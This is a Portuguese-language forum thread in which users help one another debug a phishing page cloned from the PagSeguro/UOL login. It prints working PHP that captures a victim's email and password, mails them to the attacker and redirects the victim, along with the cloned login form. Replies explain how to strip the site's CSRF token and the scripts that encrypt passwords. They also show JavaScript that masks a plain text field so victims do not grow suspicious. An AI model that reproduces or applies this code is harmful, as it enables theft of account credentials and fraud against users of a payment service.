Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

fake retorna senha codificada

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Duvida fake retorna senha codificada

    Ola, estou tendo um problema novo. Minha fake funciona normal, mas a senha que recebo não é a que foi digitada no formulario, acho que é um sistema de segurança do site que fiz a fake, mas não tenho ideia de que tecnologia é para poder enfrentá-la.
    Se alguem souber agradeço.
    Exemplo
    vitima digita email emaildavitima@gmail.com
    senha 123456

    recebo email emaildavitima@gmail.com
    senha K_#1<

    ABRAÇO A TODOS

  • Font Size
    #2
    facil

    Cara isso e fácil, na fake vc tem que achar o comando que ta fazendo isso achando remova ele. E quase certeza que ele esteja no mesmo php que manda as senha.

    Tb pode ser que o mesmo esteja com cx² e o criador uso essa manha pra ganhar tempo. rs

    Abraço

    Comment


    • Font Size
      #3
      obrigado

      amigo obrigado pela dica, mas fiz o seguinte, mudei o formulario todo, tinhas uns codigos complexos e estranhos, entao peguei um formulario de outra fake que funciona, e subsitui mas para minhas supresa a senha chegou codificada de novo, se for cx2, como posso saber?
      vou dar uma pesquisada, mas se puder dar uma luz ai pra adiantar obrigado de novo.

      fiquei pensando se o codigo que muda a senha nao estaria no corpo do codigo copiado, fora do formulario, isso é possivel?

      valeu

      Comment


      • Font Size
        #4
        rs

        Cara fica difícil falar sem vê, mais tenta fazer assim:
        Faz uma varredura nos arquivos e vê se acha algum tipo de criptografia ou link externo.

        Essa criptografia deve ser feita deste modo ou um linha de comando fazendo rodar um outro arquivo.

        Comment


        • Font Size
          #5
          Posta o cód php aqui que envia a senha pra galera poder te ajudar amigo.

          hackuv.blogspot.com



          É meu Fã? Te ajudei? Use minha fã bar!


          Sou Fã:




          "Cartão Flex, Visa, Mastercard, Itau... Sem limite, pode escolher uisque ou Redbull. Meu dinheiro é digital, compro as estrelas do céu pra melhorar o seu astral!!"

          Comment


          • Font Size
            #6
            ok, vamos la

            o codigo que envia é este

            <?php
            $email = $_POST['user'];
            $senha = $_POST['pass'];
            $tudo = "Login:".$email." - Senha: ".$senha.",<br>";
            //$fopen = fopen ("senhas.html","a");
            //fwrite($fopen, $tudo);
            //fclose($fopen);
            mail("MEU-EMAIL","ASSUNTO","$tudo");

            header("Location: PAGINA-PARA-REDIRECIONAMENTO-DA-VITIMA");
            ?>

            ESTE ESTA ENVIANDO PARA MEU EMAIL, MAS EM OUTRA FAKE ESTA NORMAL, ELE ENVIA NORMAL, POR ISSO ACHO QUE O PROBLEMA NÃO É NELE.

            este abaixo é o formulario do site copiado
            eu ja fiz uma fake onde substitui ele todo e a senha chegou codificada tambem, por isso acho que o comando nao esta nele, o action aqui não esta editado mas na fake que fiz ja tinha mudado, so coloquei assim para que possa ser melhor analisado

            inicio do formulario

            <form id="login-ibanking" action="/login.jhtml" method="post">
            <div id="login-ibanking-wrapper">
            <input type="hidden" name="acsrfToken" value="fpoy0ntClLUu.r8jnzHdWu.sq04zUVfhXn8O0rO11Ro 2-1397267524598-14400000-66" />
            <input type="hidden" name="skin" value="ps" />
            <input type="hidden" name="dest" value="REDIR|https://pagseguro.uol.com.br/transaction/search.jhtml" />
            <!--[if IE ]><label for="eml">E-mail</label><![endif]-->
            <input type="text" name="user" id="eml" placeholder="E-mail" class="add-placeholder login-input" />
            <!--[if IE ]><label for="pwd">Senha</label><![endif]-->
            <p class="helper-holder">
            <input type="password" name="pass" id="pwd" placeholder="Senha" class="add-placeholder login-input"/>
            <a href="https://sac.uol.com.br/usuario/esqueci-senha.html?skin=ps" title="Esqueceu a senha ?" class="pwd-helper">esqueceu ?</a>
            </p>
            <button type="submit" id="entrar" class="lite-button corbelFont">Entrar</button>
            <a href="/registration/registration.jhtml" class="lite-button alternate corbelFont" title="Cadastrar">Cadastrar</a>
            </div>
            </form>
            fim formulario

            EU ETRANHO ESTA PARTE AQUI:

            value="fpoy0ntClLUu.r8jnzHdWu.sq04zUVfhXn8O0rO11Ro 2-1397267524598-14400000-66" />

            MAS JÁ TENTEI SUBSTITUIR E NAO FUNFA

            AGUARDO OBSERVAÇÕES
            ABRAÇOS

            Comment


            • Font Size
              #7
              Postado Originalmente por fernando_1979 Ver Post
              o codigo que envia é este

              <?php
              $email = $_POST['user'];
              $senha = $_POST['pass'];
              $tudo = "Login:".$email." - Senha: ".$senha.",<br>";
              //$fopen = fopen ("senhas.html","a");
              //fwrite($fopen, $tudo);
              //fclose($fopen);
              mail("MEU-EMAIL","ASSUNTO","$tudo");

              header("Location: PAGINA-PARA-REDIRECIONAMENTO-DA-VITIMA");
              ?>

              ESTE ESTA ENVIANDO PARA MEU EMAIL, MAS EM OUTRA FAKE ESTA NORMAL, ELE ENVIA NORMAL, POR ISSO ACHO QUE O PROBLEMA NÃO É NELE.

              este abaixo é o formulario do site copiado
              eu ja fiz uma fake onde substitui ele todo e a senha chegou codificada tambem, por isso acho que o comando nao esta nele, o action aqui não esta editado mas na fake que fiz ja tinha mudado, so coloquei assim para que possa ser melhor analisado

              inicio do formulario

              <form id="login-ibanking" action="/login.jhtml" method="post">
              <div id="login-ibanking-wrapper">
              <input type="hidden" name="acsrfToken" value="fpoy0ntClLUu.r8jnzHdWu.sq04zUVfhXn8O0rO11Ro 2-1397267524598-14400000-66" />
              <input type="hidden" name="skin" value="ps" />
              <input type="hidden" name="dest" value="REDIR|https://pagseguro.uol.com.br/transaction/search.jhtml" />
              <!--[if IE ]><label for="eml">E-mail</label><![endif]-->
              <input type="text" name="user" id="eml" placeholder="E-mail" class="add-placeholder login-input" />
              <!--[if IE ]><label for="pwd">Senha</label><![endif]-->
              <p class="helper-holder">
              <input type="password" name="pass" id="pwd" placeholder="Senha" class="add-placeholder login-input"/>
              <a href="https://sac.uol.com.br/usuario/esqueci-senha.html?skin=ps" title="Esqueceu a senha ?" class="pwd-helper">esqueceu ?</a>
              </p>
              <button type="submit" id="entrar" class="lite-button corbelFont">Entrar</button>
              <a href="/registration/registration.jhtml" class="lite-button alternate corbelFont" title="Cadastrar">Cadastrar</a>
              </div>
              </form>
              fim formulario

              EU ETRANHO ESTA PARTE AQUI:

              value="fpoy0ntClLUu.r8jnzHdWu.sq04zUVfhXn8O0rO11Ro 2-1397267524598-14400000-66" />

              MAS JÁ TENTEI SUBSTITUIR E NAO FUNFA

              AGUARDO OBSERVAÇÕES
              ABRAÇOS
              Sugiro retirar essas linhas =>

              Código:
              <input type="hidden" name="acsrfToken" value="fpoy0ntClLUu.r8jnzHdWu.sq04zUVfhXn8O0rO11Ro 2-1397267524598-14400000-66" />
              <input type="hidden" name="skin" value="ps" />
              <input type="hidden" name="dest" value="REDIR|https://pagseguro.uol.com.br/transaction/search.jhtml" />
              e isso do código php =>

              Código:
              ",<br>"

              Comment


              • Font Size
                #8
                não resolveu

                amigo, segui sua sugestao e nada, continuo recebendo a senha codificada, como eu ja substitui td o formulario uma vez e mesmo assim ela chegou codificada acho que o comando nao esta dentro do formulario, mas ai me perco onde sera que estara???

                Comment


                • Font Size
                  #9
                  mais ou menos resolvido rs

                  mudei o type de password para text


                  <input type="text" name="pass" id="pwd" placeholder="Senha" class="add-placeholder login-input"/>

                  mas agora quando a pessoa digitar a senha aparece os caracteres digtados e isso pode trazer desconfiança, pergunta existe como mascarar isso, tipo outro type que faça os caracteres digitados não serem mostrados?

                  obrigado aos amigos que estão auxiliando

                  Comment


                  • Font Size
                    #10
                    Postado Originalmente por fernando_1979 Ver Post
                    mudei o type de password para text


                    <input type="text" name="pass" id="pwd" placeholder="Senha" class="add-placeholder login-input"/>

                    mas agora quando a pessoa digitar a senha aparece os caracteres digtados e isso pode trazer desconfiança, pergunta existe como mascarar isso, tipo outro type que faça os caracteres digitados não serem mostrados?

                    obrigado aos amigos que estão auxiliando

                    Podes fazer da seguinte forma =>

                    Código:
                    function converte() {
                    document.form1.campo.value = document.form1.campo.value.replace(/[^\s]/g, "*");
                    }
                    
                    <form name="form1" method="post">
                    <input type='text' name="campo" onkeyup="converte();">
                    </form>
                    acho que não pode ser feito nada mais além que isso, creio eu.

                    Comment


                    • Font Size
                      #11
                      Resolvido

                      AGRADEÇO aos amigos que ajudaram, eliminei uns javascrit que pelo que entendi chamavam uns aquivos php que por sua vez criptografavam as senhas, mas agora ta blz.

                      Comment

                      X
                      Working...
                      X